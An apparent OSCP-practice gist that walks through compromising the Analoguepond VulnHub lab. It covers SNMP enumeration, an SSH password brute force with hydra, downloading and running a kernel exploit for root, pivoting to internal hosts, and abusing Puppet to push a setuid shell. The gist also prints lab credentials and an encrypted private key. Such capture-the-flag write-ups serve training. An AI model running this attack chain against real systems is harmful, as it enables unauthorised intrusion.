Skip to content

Instantly share code, notes, and snippets.

@SecurityIsIllusion

SecurityIsIllusion/OSCP Preparation

Created July 30, 2017 20:38
Show Gist options
  • Save SecurityIsIllusion/d4dac7810486fe4bb495e159b795a793 to your computer and use it in GitHub Desktop.
Save SecurityIsIllusion/d4dac7810486fe4bb495e159b795a793 to your computer and use it in GitHub Desktop.
Download ZIP
Analoguepond 1 Walkthrough
Raw
OSCP Preparation
IP: 192.168.43.254
nmap 192.168.43.254 -A
port 22 was open
nmap 192.168.43.254 -sU -v
port 22
port 161 udp
192.168.43.254 -sU -sS -v
PORT STATE SERVICE
161/udp open snmp
MAC Address: 08:00:27:C9:D4:07 (Oracle VirtualBox virtual NIC)
snmpwalk -c public 192.168.43.254 -v 1
iso.3.6.1.2.1.1.1.0 = STRING: "Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (182695) 0:30:26.95
iso.3.6.1.2.1.1.4.0 = STRING: "Eric Burdon <eric@example.com>"
iso.3.6.1.2.1.1.5.0 = STRING: "analoguepond"
iso.3.6.1.2.1.1.6.0 = STRING: "There is a house in New Orleans they call it..."
iso.3.6.1.2.1.1.7.0 = INTEGER: 72
iso.3.6.1.2.1.1.8.0 = Timeticks: (1) 0:00:00.01
iso.3.6.1.2.1.1.9.1.2.1 = OID: iso.3.6.1.6.3.11.3.1.1
iso.3.6.1.2.1.1.9.1.2.2 = OID: iso.3.6.1.6.3.15.2.1.1
iso.3.6.1.2.1.1.9.1.2.3 = OID: iso.3.6.1.6.3.10.3.1.1
iso.3.6.1.2.1.1.9.1.2.4 = OID: iso.3.6.1.6.3.1
iso.3.6.1.2.1.1.9.1.2.5 = OID: iso.3.6.1.2.1.49
iso.3.6.1.2.1.1.9.1.2.6 = OID: iso.3.6.1.2.1.4
iso.3.6.1.2.1.1.9.1.2.7 = OID: iso.3.6.1.2.1.50
iso.3.6.1.2.1.1.9.1.2.8 = OID: iso.3.6.1.6.3.16.2.2.1
iso.3.6.1.2.1.1.9.1.2.9 = OID: iso.3.6.1.6.3.13.3.1.3
iso.3.6.1.2.1.1.9.1.2.10 = OID: iso.3.6.1.2.1.92
iso.3.6.1.2.1.1.9.1.3.1 = STRING: "The MIB for Message Processing and Dispatching."
iso.3.6.1.2.1.1.9.1.3.2 = STRING: "The management information definitions for the SNMP User-based Security Model."
iso.3.6.1.2.1.1.9.1.3.3 = STRING: "The SNMP Management Architecture MIB."
iso.3.6.1.2.1.1.9.1.3.4 = STRING: "The MIB module for SNMPv2 entities"
iso.3.6.1.2.1.1.9.1.3.5 = STRING: "The MIB module for managing TCP implementations"
iso.3.6.1.2.1.1.9.1.3.6 = STRING: "The MIB module for managing IP and ICMP implementations"
iso.3.6.1.2.1.1.9.1.3.7 = STRING: "The MIB module for managing UDP implementations"
iso.3.6.1.2.1.1.9.1.3.8 = STRING: "View-based Access Control Model for SNMP."
iso.3.6.1.2.1.1.9.1.3.9 = STRING: "The MIB modules for managing SNMP Notification, plus filtering."
iso.3.6.1.2.1.1.9.1.3.10 = STRING: "The MIB module for logging SNMP Notifications."
iso.3.6.1.2.1.1.9.1.4.1 = Timeticks: (1) 0:00:00.01
iso.3.6.1.2.1.1.9.1.4.2 = Timeticks: (1) 0:00:00.01
iso.3.6.1.2.1.1.9.1.4.3 = Timeticks: (1) 0:00:00.01
iso.3.6.1.2.1.1.9.1.4.4 = Timeticks: (1) 0:00:00.01
iso.3.6.1.2.1.1.9.1.4.5 = Timeticks: (1) 0:00:00.01
iso.3.6.1.2.1.1.9.1.4.6 = Timeticks: (1) 0:00:00.01
iso.3.6.1.2.1.1.9.1.4.7 = Timeticks: (1) 0:00:00.01
iso.3.6.1.2.1.1.9.1.4.8 = Timeticks: (1) 0:00:00.01
iso.3.6.1.2.1.1.9.1.4.9 = Timeticks: (1) 0:00:00.01
iso.3.6.1.2.1.1.9.1.4.10 = Timeticks: (1) 0:00:00.01
iso.3.6.1.2.1.25.1.1.0 = Timeticks: (183727) 0:30:37.27
iso.3.6.1.2.1.25.1.2.0 = Hex-STRING: 07 E1 07 17 07 35 0C 00 2B 01 00
iso.3.6.1.2.1.25.1.3.0 = INTEGER: 393216
iso.3.6.1.2.1.25.1.4.0 = STRING: "BOOT_IMAGE=/vmlinuz-3.19.0-25-generic root=/dev/mapper/analoguepond--vg-root ro
"
iso.3.6.1.2.1.25.1.5.0 = Gauge32: 0
iso.3.6.1.2.1.25.1.6.0 = Gauge32: 26
iso.3.6.1.2.1.25.1.7.0 = INTEGER: 0
End of MIB
snmpwalk -c public 192.168.43.254 -v 1
iso.3.6.1.2.1.1.1.0 = STRING: "Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (182695) 0:30:26.95
iso.3.6.1.2.1.1.4.0 = STRING: "Eric Burdon <eric@example.com>"
iso.3.6.1.2.1.1.5.0 = STRING: "analoguepond"
iso.3.6.1.2.1.1.6.0 = STRING: "There is a house in New Orleans they call it..."
iso.3.6.1.2.1.1.7.0 = INTEGER: 72
iso.3.6.1.2.1.1.8.0 = Timeticks: (1) 0:00:00.01
iso.3.6.1.2.1.1.9.1.2.1 = OID: iso.3.6.1.6.3.11.3.1.1
iso.3.6.1.2.1.1.9.1.2.2 = OID: iso.3.6.1.6.3.15.2.1.1
iso.3.6.1.2.1.1.9.1.2.3 = OID: iso.3.6.1.6.3.10.3.1.1
iso.3.6.1.2.1.1.9.1.2.4 = OID: iso.3.6.1.6.3.1
iso.3.6.1.2.1.1.9.1.2.5 = OID: iso.3.6.1.2.1.49
iso.3.6.1.2.1.1.9.1.2.6 = OID: iso.3.6.1.2.1.4
iso.3.6.1.2.1.1.9.1.2.7 = OID: iso.3.6.1.2.1.50
iso.3.6.1.2.1.1.9.1.2.8 = OID: iso.3.6.1.6.3.16.2.2.1
iso.3.6.1.2.1.1.9.1.2.9 = OID: iso.3.6.1.6.3.13.3.1.3
iso.3.6.1.2.1.1.9.1.2.10 = OID: iso.3.6.1.2.1.92
iso.3.6.1.2.1.1.9.1.3.1 = STRING: "The MIB for Message Processing and Dispatching."
iso.3.6.1.2.1.1.9.1.3.2 = STRING: "The management information definitions for the SNMP User-based Security Model."
iso.3.6.1.2.1.1.9.1.3.3 = STRING: "The SNMP Management Architecture MIB."
iso.3.6.1.2.1.1.9.1.3.4 = STRING: "The MIB module for SNMPv2 entities"
iso.3.6.1.2.1.1.9.1.3.5 = STRING: "The MIB module for managing TCP implementations"
iso.3.6.1.2.1.1.9.1.3.6 = STRING: "The MIB module for managing IP and ICMP implementations"
iso.3.6.1.2.1.1.9.1.3.7 = STRING: "The MIB module for managing UDP implementations"
iso.3.6.1.2.1.1.9.1.3.8 = STRING: "View-based Access Control Model for SNMP."
iso.3.6.1.2.1.1.9.1.3.9 = STRING: "The MIB modules for managing SNMP Notification, plus filtering."
iso.3.6.1.2.1.1.9.1.3.10 = STRING: "The MIB module for logging SNMP Notifications."
iso.3.6.1.2.1.1.9.1.4.1 = Timeticks: (1) 0:00:00.01
iso.3.6.1.2.1.1.9.1.4.2 = Timeticks: (1) 0:00:00.01
iso.3.6.1.2.1.1.9.1.4.3 = Timeticks: (1) 0:00:00.01
iso.3.6.1.2.1.1.9.1.4.4 = Timeticks: (1) 0:00:00.01
iso.3.6.1.2.1.1.9.1.4.5 = Timeticks: (1) 0:00:00.01
iso.3.6.1.2.1.1.9.1.4.6 = Timeticks: (1) 0:00:00.01
iso.3.6.1.2.1.1.9.1.4.7 = Timeticks: (1) 0:00:00.01
iso.3.6.1.2.1.1.9.1.4.8 = Timeticks: (1) 0:00:00.01
iso.3.6.1.2.1.1.9.1.4.9 = Timeticks: (1) 0:00:00.01
iso.3.6.1.2.1.1.9.1.4.10 = Timeticks: (1) 0:00:00.01
iso.3.6.1.2.1.25.1.1.0 = Timeticks: (183727) 0:30:37.27
iso.3.6.1.2.1.25.1.2.0 = Hex-STRING: 07 E1 07 17 07 35 0C 00 2B 01 00
iso.3.6.1.2.1.25.1.3.0 = INTEGER: 393216
iso.3.6.1.2.1.25.1.4.0 = STRING: "BOOT_IMAGE=/vmlinuz-3.19.0-25-generic root=/dev/mapper/analoguepond--vg-root ro
"
iso.3.6.1.2.1.25.1.5.0 = Gauge32: 0
iso.3.6.1.2.1.25.1.6.0 = Gauge32: 26
iso.3.6.1.2.1.25.1.7.0 = INTEGER: 0
enum4linux -U 192.168.43.254
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Jul 23 02:56:13 2017
==========================
| Target Information |
==========================
Target ........... 192.168.43.254
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
======================================================
| Enumerating Workgroup/Domain on 192.168.43.254 |
======================================================
[E] Can't find workgroup/domain
=======================================
| Session Check on 192.168.43.254 |
=======================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437.
[E] Server doesn't allow session using username '', password ''. Aborting remainder of tests.
google There is house in new orleans...
cewl http://www.azlyrics.com/lyrics/bobdylan/houseoftherisinsun.html > /root/Desktop/analougepnd/profile.txt
my ip was blocked when i again tried
so i copied the lyrics and hosted it as profiler.php on my apache and then i ran cewl to get wordlist for ssh hydra
cewl -d 2 -m 6 -w /root/Desktop/analougepnd/profile.txt http://192.168.43.95/profiler.php
after adding some more words/usernames obtained from snmp enumeration, it's hydra time. but manual brutefore may also work.
hydra -e nsr -L /root/Desktop/analougepnd/profile.txt -P /root/Desktop/analougepnd/profile.txt 192.168.43.254 ssh
[22][ssh] host: 192.168.43.254 login: eric password: therisingsun
ssh eric@192.168.43.254
therisingsun
id
uid=1000(eric) gid=1000(eric) groups=1000(eric),4(adm),24(cdrom),30(dip),46(plugdev),111(libvirtd),112(lpadmin),113(sambashare)
uname -a
Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
pwd
/home/eric
ls
reticulatingsplines.gif
file reticulatingsplines.gif
reticulatingsplines.gif: GIF image data, version 89a, 382 x 359
scp reticulatingsplines.gif root@192.168.43.95:/root/Desktop/analougepond
A Joke
Privilege Escalation
Overlays Exploit worked.
https://www.exploit-db.com/exploits/39166/
Download it
Compile and copy it in /var/www/html
wget http://192.168.43.95/39166
chmod 777 39166
./39166
eric@analoguepond:~$ ./39166
root@analoguepond:~#
id
uid=0(root) gid=1000(eric) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),111(libvirtd),112(lpadmin),113(sambashare),1000(eric)
ls
flag.txt
cat flag.txt
C'Mon Man! Y'all didn't think this was the final flag so soon...?
Did the bright lights and big city knock you out...? If you pull
a stunt like this again, I'll send you back to Walker...
This is obviously troll flah #1 So keep going.
Troll Flag
ifconfig
eth0 Link encap:Ethernet HWaddr 08:00:27:c9:d4:07
inet addr:192.168.43.254 Bcast:192.168.43.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:fec9:d407/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:47685 errors:0 dropped:0 overruns:0 frame:0
TX packets:49456 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:4655624 (4.6 MB) TX bytes:8767032 (8.7 MB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:4 errors:0 dropped:0 overruns:0 frame:0
TX packets:4 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:372 (372.0 B) TX bytes:372 (372.0 B)
virbr0 Link encap:Ethernet HWaddr 52:54:00:b2:23:25
inet addr:192.168.122.1 Bcast:192.168.122.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:636 errors:0 dropped:0 overruns:0 frame:0
TX packets:606 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:38700 (38.7 KB) TX bytes:48160 (48.1 KB)
vnet0 Link encap:Ethernet HWaddr fe:54:00:5b:05:f7
inet6 addr: fe80::fc54:ff:fe5b:5f7/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:2207 errors:0 dropped:0 overruns:0 frame:0
TX packets:8181 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:500
RX bytes:982112 (982.1 KB) TX bytes:1388441 (1.3 MB)
vnet1 Link encap:Ethernet HWaddr fe:54:00:6d:93:6a
inet6 addr: fe80::fc54:ff:fe6d:936a/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:2167 errors:0 dropped:0 overruns:0 frame:0
TX packets:7382 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:500
RX bytes:1064317 (1.0 MB) TX bytes:1249030 (1.2 MB)
iptables -L
Chain INPUT (policy ACCEPT)
target prot opt source destination
ACCEPT udp -- anywhere anywhere udp dpt:domain
ACCEPT tcp -- anywhere anywhere tcp dpt:domain
ACCEPT udp -- anywhere anywhere udp dpt:bootps
ACCEPT tcp -- anywhere anywhere tcp dpt:bootps
Chain FORWARD (policy ACCEPT)
target prot opt source destination
ACCEPT all -- anywhere 192.168.122.0/24 ctstate RELATED,ESTABLISHED
ACCEPT all -- 192.168.122.0/24 anywhere
ACCEPT all -- anywhere anywhere
REJECT all -- anywhere anywhere reject-with icmp-port-unreachable
REJECT all -- anywhere anywhere reject-with icmp-port-unreachable
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
ACCEPT udp -- anywhere anywhere udp dpt:bootpc
arp -n
Address HWtype HWaddress Flags Mask Iface
192.168.43.67 ether 08:00:27:4d:1b:bb C eth0
192.168.43.95 ether 08:00:27:4d:1b:bb C eth0
192.168.122.3 ether 52:54:00:6d:93:6a C virbr0
192.168.122.2 ether 52:54:00:5b:05:f7 C virbr0
192.168.43.185 ether 9c:ad:97:ce:5d:21 C eth0
192.168.43.1 ether 00:27:15:44:59:47 C eth0
arp -a
? (192.168.43.67) at 08:00:27:4d:1b:bb [ether] on eth0
kali (192.168.43.95) at 08:00:27:4d:1b:bb [ether] on eth0
barringsbank.example.com (192.168.122.3) at 52:54:00:6d:93:6a [ether] on virbr0
puppet.example.com (192.168.122.2) at 52:54:00:5b:05:f7 [ether] on virbr0
hulk (192.168.43.185) at 9c:ad:97:ce:5d:21 [ether] on eth0
? (192.168.43.1) at 00:27:15:44:59:47 [ether] on eth0
ssh root@192.168.122.3
ssh_exchange_identification: read: Connection reset by peer
root@analoguepond:/root# ssh root@192.168.122.2
The authenticity of host '192.168.122.2 (192.168.122.2)' can't be established.
ECDSA key fingerprint is 4e:e6:d6:38:8a:9b:3c:aa:0c:55:95:a6:57:ce:f9:e5.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.122.2' (ECDSA) to the list of known hosts.
+-----------------------------------------------------------------------------+
| Passwords are very dated.. Removing spaces helps sandieshaw log in with her |
| most famous song |
+-----------------------------------------------------------------------------+
root@192.168.122.2's password:
https://en.wikipedia.org/wiki/Sandie_Shaw
Sandie Shaw, MBE (born Sandra Ann Goodrich; 26 February 1947) is an English singer. One of the most successful British female singers of the 1960s, in 1967 the song "Puppet on a String" performed by her became the first British entry to win the Eurovision Song Contest. After a long and successful career, Shaw announced her retirement from the music industry in 2013
ssh sandieshaw@192.168.122.2
puppetonastring
ps aux | grep puppet
puppet 976 1.4 5.9 449568 60348 ? Ssl 07:26 3:09 /usr/bin/ruby /usr/bin/puppet master
root 7269 0.1 0.0 4448 848 ? Ss 11:10 0:00 /bin/sh -c /usr/bin/puppet agent --test > /dev/null 2>&1
root 7270 53.2 5.0 286100 50876 ? Sl 11:10 0:36 /usr/bin/ruby /usr/bin/puppet agent --test
root 7474 0.0 4.5 287024 46312 ? Rl 11:11 0:00 /usr/bin/ruby /usr/bin/puppet agent --test
sandies+ 7478 0.0 0.2 11756 2148 pts/0 S+ 11:11 0:00 grep puppet
cd /etc/puppet
ls
auth.conf etckeeper-commit-post files manifests puppet.conf
environments etckeeper-commit-pre fileserver.conf modules templates
cd manifests/
ls
environments.conf nodes.pp site.pp
cat environments.conf
manifest = $confdir/manifests/site.pp
manifestdir = $confdir/manifests
modulepath = $confdir/modules
sandieshaw@puppet:/etc/puppet/manifests$ cat nodes.pp
node 'default' {
include vulnhub
}
node 'puppet.example.com' inherits 'default' {
include wiggle
}
node 'barringsbank.example.com' inherits 'default' {
}
sandieshaw@puppet:/etc/puppet/manifests$ cat site.pp
node 'default' {
include vulnhub
}
node 'puppet.example.com' inherits 'default' {
include wiggle
}
node 'barringsbank.example.com' inherits 'default' {
include fiveeights
}
sandieshaw@puppet:/etc/puppet/modules/vulnhub/manifests$ cat init.pp
## Module to unwind changed #vulnhub people make. This will unwind the most
## common vectors they used to get at my other VMs
class vulnhub {
## purge packages they abuse too (hello mrB3n, GKNSB, Ch3rn0byl, mr_h4sh)
$purge = [ "nano", "wget", "curl", "fetch","nmap", "netcat-traditional",
"ncat", "netdiscover", "lftp" ]
package { $purge:
ensure => purged,
}
## The encryption is still primative Egyptian (Hello drweb)
$theresas_nightmare = [ "cryptcat", "socat" ]
package { $theresas_nightmare:
ensure => present,
}
## Adding to sudoers is a bit naughty so reverse that (most of #vulnhub)
file { "/etc/sudoers.d":
ensure => "directory",
recurse => true,
purge => true,
force => true,
owner => root,
group => root,
mode => 0755,
source => "puppet:///modules/vulnhub/sudoers.d",
}
## revert /etc/passwd (Hey rfc, kevinnz!)
file {'/etc/sudoers':
ensure => present,
owner => root,
group => root,
mode => 0440,
source => "puppet:///modules/vulnhub/sudoers",
}
## revert /etc/passwd (Hey Rasta_Mouse!)
file {'/etc/passwd':
ensure => present,
owner => root,
group => root,
mode => 0644,
source => "puppet:///modules/vulnhub/${hostname}-passwd",
}
## and /etc/group (Hello to you cmaddy)
file {'/etc/group':
ensure => present,
owner => root,
group => root,
mode => 0644,
source => "puppet:///modules/vulnhub/${hostname}-group",
}
## Mr Potato Head! BACKDOORS ARE NOT SECRETS (Hey GKNSB!)
file {'/etc/ssh/ssd_config':
ensure => present,
owner => root,
group => root,
mode => 0644,
source => "puppet:///modules/vulnhub/${hostname}-sshd_config",
notify => Service["ssh"],
}
## Leave US keyboard for those crazy yanks, and not to torture Ch3rn0byl like
## Gibson
cron { "puppet check in":
command => "/usr/bin/puppet agent --test > /dev/null 2>&1",
user => "root",
minute => "*/10",
ensure => present,
}
## Everyone forbidden by default (Hey wrboyce, rasta_mouse, 8bitkiwi)
file {'/etc/hosts.deny':
ensure => present,
owner => root,
group => root,
mode => 0644,
source => "puppet:///modules/vulnhub/hosts.deny",
}
## Firewall off to only specific hosts (Hello Bas!)
file {'/etc/hosts.allow':
ensure => present,
owner => root,
group => root,
mode => 0644,
source => "puppet:///modules/vulnhub/${hostname}-hosts.allow",
}
## Don't fill up the disk (Hey GlobalMaquereau, g0bl1n)
tidy { "/var/lib/puppet/reports":
age => "1h",
recurse => true,
}
## Changing openssh config requires restart
service { 'ssh':
ensure => running,
enable => true,
hasstatus => true,
hasrestart => true,
}
}
sandieshaw@puppet:/etc/puppet/modules/wiggle/files$ cat spin.c
#include <stdio.h>
#include <unistd.h>
void
advance_spinner() {
static char bars[] = { '/', '-', '\\', '|' };
static int nbars = sizeof(bars) / sizeof(char);
static int pos = 0;
printf("%c\r", bars[pos]);
fflush(stdout);
pos = (pos + 1) % nbars;
}
int
main() {
while (1) {
advance_spinner();
usleep(300);
}
return 0;
}
We need to get root of sandieshaw.
We have spin which is copied to /tmp by puppet with root privileges.
Since, there is no C Compiler so we compile on our machine or eric's machine and scp to sandieshaw on directory /etc/puppet/modules/wiggle/files
Then wait for puppet to copy spin to temp.
Once it is copied, ./spin and we are root.
./spin
# id
uid=1000(sandieshaw) gid=1000(sandieshaw) euid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),110(lpadmin),111(sambashare),1000(sandieshaw)
whoami
root
cd /root
# ls
protovision
# cd protovision
# ls
flag1.txt.0xff jim melvin
# cat flag1.txt.0xff
3d3d674c7534795a756c476130565762764e4849793947496c4a585a6f5248496b4a3362334e33636842
48496842435a756c6d5a675148616e6c5762675533623542434c756c47497a564764313557617442794d
79415362764a6e5a674d585a7446325a79463256676732593046326467777961793932646751334a754e
585a765247497a6c47613042695a4a4279615535454d70647a614b706b5a48316a642f67325930463264
763032626a35535a6956486431395765756333643339794c364d486330524861
# cat jim
Mr Potato Head! Backdoors are not a...
# cat melvin
Boy you guys are dumb! I got this all figured out...
http://www.convertstring.com/EncodeDecode/HexDecode
==gLu4yZulGa0VWbvNHIy9GIlJXZoRHIkJ3b3N3chBHIhBCZulmZgQHanlWbgU3b5BCLulGIzVGd15WatByMyA
SbvJnZgMXZtF2ZyF2Vgg2Y0F2dgwyay92dgQ3JuNXZvRGIzlGa0BiZJByaU5EMpdzaKpkZH1jd/g2Y0F2dv02b
j5SZiVHd19Weuc3d39yL6MHc0RHa
aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1HZkpKazdpME5UayBJZiB0aGlzIGRvZXNuJ3Qgd29yaywgd2F0Y2ggV2FyZ2FtZXMgZnJvbSAyMyBtaW51dG
VzIGluLCB5b3UgbWlnaHQgZmluZCBhIHBhc3N3b3JkIHRoZXJlIG9yIHNvbWV0aGluZy4uLg==
echo 'aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1HZkpKazdpME5UayBJZiB0aGlzIGRvZXNuJ3Qgd29yaywgd2F0Y2ggV2FyZ2FtZXMgZnJvbSAyMyBtaW51dGVzIGluLCB5b3UgbWlnaHQgZmluZCBhIHBhc3N3b3JkIHRoZXJlIG9yIHNvbWV0aGluZy4uLg==' | base64 -d
https://www.youtube.com/watch?v=GfJJk7i0NTk If this doesn't work, watch Wargames from 23 minutes in, you might find a password there or something...
Mr Potato Head! Backdoors are not a... Secret
Boy you guys are dumb! I got this all figured out... Maize
la -alh
.I_have_you_now
cd .I_have_you_now
ls -alh
a
grauniad_1995-02-27.jpeg
scp grauniad_1995-02-27.jpeg root@192.168.43.95:/root/Desktop/
cd /root/protovision/.I_have_you_now/.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u./v./w./x./y/.z
ls -alh
my_world_you_are_persistent_try
nleeson_key.gpg
cat my_world_you_are_persistent_try
joshua
i was having some issue with decrypting the gpg file so i copied it to my kali machine.
gpg nleeson_key.gpg
gpg: CAST5 encrypted data
gpg: gpg-agent is not available in this session
gpg: encrypted with 1 passphrase
gpg: error creating `nleeson_key': Permission denied
gpg: WARNING: message was not integrity protected
gpg nleeson_key.gpg
gpg nleeson_key.gpg
gpg: keybox '/root/.gnupg/pubring.kbx' created
gpg: WARNING: no command supplied. Trying to guess what you mean ...
gpg: CAST5 encrypted data
gpg: encrypted with 1 passphrase
gpg: WARNING: message was not integrity protected
root@kali:~/Desktop/analougepnd# cat nleeson_key
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,1864E0393453C88F778D5E02717B8B16
RTSpHZnf1Onpy3OHfSat0Bzbrx8wd6EBKlbdZiGjEB0AC4O0ylrSBoWsEJ/loSL8
jdTbcSG0/GWJU7CS5AQdK7KctWwqnOHe9y4V15gtZcfgxNLrVfMUVAurZ3n2wQqK
ARmqBXhftPft8EBBAwWwQmBrD+ufF2uaJoKr4Bfu0zMFQxRnNDooBes5wyNO/7k6
osvGqTEX/xwJG1GB5X0jsDCmBH4WXhafa0nzZXvd2Pd3UpaWPEgyq3vxIQaredR8
VbJbPSeKypTIj3UyEj+kjczhCiWw9t0Mv0aV4FtMOesnDQYJskL8kSLGRkN+7lHD
IcHz7az9oqYGBSq77lPkmk7oIpT/pg80pfCyHExROwlTRPzVRHv7KGiKd35R0Hl9
7CUQPCjH5ltQW4B6XUmxmoT8N14w5HOxb/JlV7s2g6dXYT0azOeqDsGivpgMY3vy
rtVakLIsZeYaZYSr6WvTFclXWYctYPMgzRewiRPjyn6DXiD6MtCJZj2CqJ47tP37
eRRgRRH6a1Sm/BkfSPIXlV0tTpOXfjtHG7VoIc5X343GL/WHM/nhNFvMLdRnVXRM
YOEKAsYklBLqZ99btTESwJZt9HG/cGpQrbgFwxKPoJy7f5wNLOa1ZhpDyw1IqokO
Pq4r8zZj4ASyg3gl7ByG11C272mkMG8yiIwOckVgNec/se18PUGBw1HHgRuyzDym
/6/cwkDzoJlResjsNDQCQcNzSOoZxi3GFIIiB+HjG84MF+ofnn3ayaUZLUaBbPMJ
jQ7dP6wqIMYwY5ZM6nRQ+RnL6QVBHnXH9RjmbzdVMzmQDjPS0lOg5xkU8B78vG6e
lphvmlLSM+PFVOqPwhVB8yon97aU23npKIOPu44VsUXU0auKI94qoX0I1EDDQFrE
UqpWUpCCHrRRTZCdnnE6RnJZ+rjGPvFA95lhUp1fpF8l4U3a8qKlsdtWmzYxHdyg
+w0QE8VdDsNqgCP7W6KzvN5E5HJ0bbQasadAX5eDd6I94V0fCZrPlzM+5CAXH4E4
qhmWQPCw7Q1CnW61yG8e9uD1W7yptK5NyZpHHkUbZGIS+P7EZtS99zDPh3V4N7I2
Mryzxkmi2JyQzf4T1cfK7JTdIC2ULGmFZM26BX3UCV0K+9OOGgRDPU4noS0gNHxP
VaWVmjGgubE4GDlW0tgw1ET+LaUdAv/LE+3gghpRLn1imdaW9elnIeaVeOWcyrBC
Ypl8AjYXNRd0uLWBC8xbakmK1tZUPXwefqjQpKjuIuYmmVes3M4DFxGQajmK03nO
oGaByHu0RVjy0x/zBuOuOp6eKpeaiLWfLM5DSIWlksL/2dmAloSs3LrIPu4dTnRb
v2YQ+72nLI62alLEaKwXUBoHSSRNTv0hbOyvV8YUp4EmJ8yShAmEE/n9Et62BwYB
rsi0RhEfih+43PzlwB91I4Elr2k3eBwQ9XiF3KdVgj6wvwqNLZ7aC5YpLcYaVyNT
fKzUxX02Ejvo60xWJ8u6GIhUK404s2WVeG/PCLwtrKGjpyPCn3yCWpCWpGPuVNrx
Wg0Um581e4Vw5CLDL5hRLmo7wiqssuL3/Uugf/lc2vF+MxJyoI1F9Zkt2xvRYrLB
-----END RSA PRIVATE KEY-----
export TERM=xterm
chmod 777 nleeson_key
ssh -i nleeson_key nleeson@192.168.122.3
joshua
nleeson@barringsbank:~$ id
uid=1000(nleeson) gid=1000(nleeson) groups=1000(nleeson),4(adm),24(cdrom),30(dip),46(plugdev),110(lpadmin),111(sambashare)
nleeson@barringsbank:~$ ls
reticulatingsplines.gif
nothing...
Let's go back to other user.
cat /etc/puppet/modules/fiveeights/manifests/init.pp
## Nick's secret file hide the screw-ups
class fiveeights {
## private key held elsewhere. Keep looking
file { '/home/nleeson/.ssh/authorized_keys':
content => "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCTPnm+I5zEPNUHc1PgmsIxK8XCvtRECY6nTFOdNL3CxVBepWLv0wgPWBIUAkP9nfPUshXo1EIjcvb0+RGtJ8KNbVK4vW2ZCwgNicUoYnCcVtSrGtz9oAnKpeGcCKAuHG6ybt4Opxe75eF4dZt2/aDRrPMw8PK8l8a3o9ZdJlIgdLiWORPiga/zUu1zuySkQPFHzPBp29MvWVwAYsssEjcXINfuvysPbdBzMJaJ2o4jmFV9g/uCz3xjRi9zULP1VpoRYtZUQadU2CpuN1RtVDeoSeYVe6vYkeLz6rCBQTUfi9Nea4X1JtvaTfnrquRMWOr43WnMMcdFpIsBd8oCI4jH root@puppet",
}
}
cd /etc/puppet/modules/fiveeights/manifests
cp init.pp /etc/puppet/
export TERM=xterm
vi init.pp
file { [ "/tmp/spin" ]:
ensure => present,
mode => 4755,
owner => root,
group => root,
source => "puppet:///modules/wiggle/spin";
}
wait for puppet to push the file to tmp
ssh -i nleeson_key nleeson@192.168.122.3
cd tmp/
./spin
id
uid=1000(nleeson) gid=1000(nleeson) euid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),110(lpadmin),111(sambashare),1000(nleeson)
cd /root
ls -alh
file me.jpeg
me.jpeg: JPEG image data, JFIF standard 1.01
scp me.jpeg root@192.168.43.95:/root/Desktop
steghide --extract -sf me.jpeg
reticulatingsplines
wrote extracted data to "primate_egyptian_flag.txt".
cat primate_egyptian_flag.txt
Hex Code
674143496741434967414349674143496741434967414349674143496741
69434b34694c7555336235426963765a47497a4e5859694269636c526d62
6c5a4749684279636e556d636c686b430a67414349674143496741434967
41434967414349674143496741434967414349674143494b386c4c743053
4c7538464967414349674143496734534c73414349674143496741434967
4143490a6741434967414349674143496741434967414349674143496741
43496741434967414349674143494b34435967414349674143496763794a
74347958663543586742434938424349674143490a663931586639315866
393158663931586639315875307a4b7273434c6741434967414349674143
4967416943634243496734434c6741795867414349674143496741795867
414358674143490a39305450393054503930545039305450393054503934
796276396d4c666843496741434967414349674143494b77484967414349
3878335838394666663931586639315838783358703831580a3842434967
414349674143496741434967414349674143496e346e6667414349674143
496741434967414349676f41666741434967774866397758503831545039
30545039774866393054500a677746496741434967414349674143496741
434967414349674143496741434967414349674143496741434967414349
4b384349673847497642794a2b424749674143496741794a2b4243490a67
